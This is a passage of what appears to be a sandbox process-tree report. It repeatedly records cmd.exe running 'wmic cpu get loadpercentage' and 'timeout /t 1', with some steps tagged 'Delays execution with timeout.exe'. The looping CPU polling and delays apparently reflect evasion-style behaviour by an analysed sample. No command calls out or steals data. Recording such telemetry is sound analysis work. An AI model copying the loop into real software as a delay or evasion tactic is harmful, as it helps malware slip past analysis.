- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:8
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:68
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2792
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:8
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:8
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
